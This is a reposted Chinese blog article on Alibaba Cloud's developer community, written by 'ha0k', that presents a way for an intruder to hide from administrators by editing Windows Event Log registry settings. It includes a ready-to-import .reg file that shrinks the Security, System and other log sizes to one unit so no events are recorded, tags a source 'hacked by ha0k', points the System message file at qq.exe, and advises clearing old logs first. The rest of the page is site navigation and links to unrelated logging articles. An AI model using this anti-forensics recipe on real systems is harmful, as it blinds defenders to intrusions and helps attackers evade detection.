备案控制台
探索云世界
开发者社区 安全 文章 正文

修改日志文件属性保护自己不会被管理员发现(思路)

2009-10-12 698
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: by ha0k日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,这样的话即可完美保证入侵不被记录,比清除日志更安全.

by ha0k
日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,
这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,
这样的话即可完美保证入侵不被记录,比清除日志更安全.当然首先配合清除日志工具,清除先前的痕迹,效果更好.
以下是demo代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Internet Explorer]
"MaxSize"=dword:00000001
"File"="%SystemRoot%/System32/Config/Internet Explorer.evt"
"Retention"=dword:00000000
"Sources"="hacked by ha0k"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Security]
"file"="%SystemRoot%/System32/config/SecEvent.Evt"
"MaxSize"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/System]
"EventMessageFile"="%systemroot%/system32/qq.exe"
"File"="%SystemRoot%/system32/config/SysEvent.Evt"
"MaxSize"=dword:00000001
{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/144.html}

 

文章标签:
日志服务
Windows
存储
安全
关键词:
日志服务文件
日志服务属性
日志服务管理员
相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
cnbird
目录
相关文章
风水道人
|
23天前
|
Linux Shell
Linux手动清理Linux脚本日志定时清理日志和log文件执行表达式
Linux手动清理Linux脚本日志定时清理日志和log文件执行表达式
风水道人
77 1
游客jlcbfseqvg25k
|
1月前
|
Dubbo Java 应用服务中间件
Dubbo日志文件输出到指定目录 如何定义?
Dubbo日志文件输出到指定目录 如何定义?
游客jlcbfseqvg25k
29 0
泡沫o0
|
1月前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 查看系统中的UUCP日志文件 uulog命令 使用指南
【Shell 命令集合 网络通讯 】Linux 查看系统中的UUCP日志文件 uulog命令 使用指南
泡沫o0
29 0
JaneYork
|
1月前
|
Linux 应用服务中间件 nginx
【PUSDN】centos查看日志文件内容,包含某个关键字的前后5行日志内容,centos查看日志的几种方法
【PUSDN】centos查看日志文件内容,包含某个关键字的前后5行日志内容,centos查看日志的几种方法
JaneYork
48 0
泡沫o0
|
1月前
|
监控 Shell Linux
【Shell 命令集合 系统管理 】Linux 自动轮转(log rotation)日志文件 logrotate命令 使用指南
【Shell 命令集合 系统管理 】Linux 自动轮转(log rotation)日志文件 logrotate命令 使用指南
泡沫o0
50 0
哥的时代
|
3月前
|
SQL Java 数据库连接
Mybatis之Mybatis简介、搭建Mybatis相关步骤(开发环境、maven、核心配置文件、mapper接口、映射文件、junit测试、log4j日志)
【1月更文挑战第2天】 MyBatis最初是Apache的一个开源项目iBatis, 2010年6月这个项目由Apache Software Foundation迁移到了Google Code。随着开发团队转投Google Code旗下,iBatis3.x正式更名为MyBatis。代码于2013年11月迁移到Github iBatis一词来源于“internet”和“abatis”的组合,是一个基于Java的持久层框架。iBatis提供的持久层框架包括SQL Maps和Data Access Objects(DAO)
哥的时代
200 3
Mybatis之Mybatis简介、搭建Mybatis相关步骤(开发环境、maven、核心配置文件、mapper接口、映射文件、junit测试、log4j日志)
游客jlcbfseqvg25k
|
1月前
|
Dubbo Java 应用服务中间件
Dubbo日志文件输出到指定目录 如何定义?
Dubbo日志文件输出到指定目录 如何定义?
游客jlcbfseqvg25k
35 0
游客jlcbfseqvg25k
|
1月前
|
Dubbo Java 应用服务中间件
Dubbo日志文件输出到指定目录 如何定义?
Dubbo日志文件输出到指定目录 如何定义?
游客jlcbfseqvg25k
26 0
1941623231718325
|
5天前
|
运维 Oracle 关系型数据库
Oracle日志文件:数据王国的“记事本”
【4月更文挑战第19天】Oracle日志文件是数据库稳定运行的关键,记录数据变更历史,用于恢复和故障处理。它们协调并发操作,确保数据一致性和完整性。日志文件实时写入操作信息并定期刷新到磁盘,便于数据恢复。然而,日志文件需备份和归档以保证安全性,防止数据丢失。日志文件,数据王国的“记事本”,默默守护数据安全。
1941623231718325
13 1
泡沫o0
|
1月前
|
监控 Shell Linux
【Shell 命令集合 系统管理 】Linux 实时监控日志文件 swatch命令 使用指南
【Shell 命令集合 系统管理 】Linux 实时监控日志文件 swatch命令 使用指南
泡沫o0
34 1

热门文章

最新文章

  • 1
    更优性能与性价比,从自建 ELK 迁移到 SLS 开始
  • 2
    Seata常见问题之服务端 error日志没有输出,客户端执行sql报错如何解决
  • 3
    MySQL数据库,可以使用二进制日志(binary log)进行时间点恢复
  • 4
    使用Java代码打印log日志
  • 5
    Linux手动清理Linux脚本日志定时清理日志和log文件执行表达式
  • 6
    【深入探究 C++ 日志库清理策略】glog、log4cplus 和 spdlog 的日志文件管理策略
  • 7
    /var/log/auth.log日志详解
  • 8
    R语言计量经济学:工具变量法(两阶段最小二乘法2SLS)线性模型分析人均食品消费时间序列数据和回归诊断
  • 9
    Linux&Windows 日志分析 陇剑杯 CTF
  • 10
    提升日志管理效率:掌握CKA认证中的边车容器技巧
  • 1
    log4j异常日志过滤规则配置
    11
  • 2
    Oracle日志文件:数据王国的“记事本”
    13
  • 3
    基于Java的公司员工工作日志办公系统的设计与实现(源码+lw+部署文档+讲解等)
    28
  • 4
    工具变量法(两阶段最小二乘法2SLS)线性模型分析人均食品消费时间序列数据和回归诊断2
    12
  • 5
    R语言计量经济学:工具变量法(两阶段最小二乘法2SLS)线性模型分析人均食品消费时间序列数据和回归诊断
    37
  • 6
    Linux&Windows 日志分析 陇剑杯 CTF
    37
  • 7
    微信小程序全栈开发中的异常处理与日志记录
    28
  • 8
    更优性能与性价比,从自建 ELK 迁移到 SLS 开始
    54641
  • 9
    glog --- C++日志库
    13
  • 10
    `/var/log/syslog` 和 `/var/log/messages` 日志详解
    19

    • 相关课程

    更多
  • 日志服务SLS实现云产品可观测
  • 日志服务 SLS 可观测数据分析平台介绍
  • 大数据知识图谱系列—基于ELK+Flink日志全观测最佳实践
  • 场景实践-基于阿里云Quick BI 对MOOC网站日志分析

    • 相关电子书

    更多
  • PostgresChina2018_赖思超_PostgreSQL10_hash索引的WAL日志修改版final
  • Kubernetes下日志实时采集、存储与计算实践
  • 日志数据采集与分析对接

    • 相关实验场景

    更多
  • 使用CloudLens管理SLS日志采集
  • 使用CloudLens采集PolarDB日志并进行审计分析
  • 使用CloudLens采集RDS日志并进行审计分析
  • 基于SLS快速实现业务可观测
  • 使用日志服务SLS进行OSS可观测分析
  • 多账号体系下使用日志服务中心化的管理日志
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)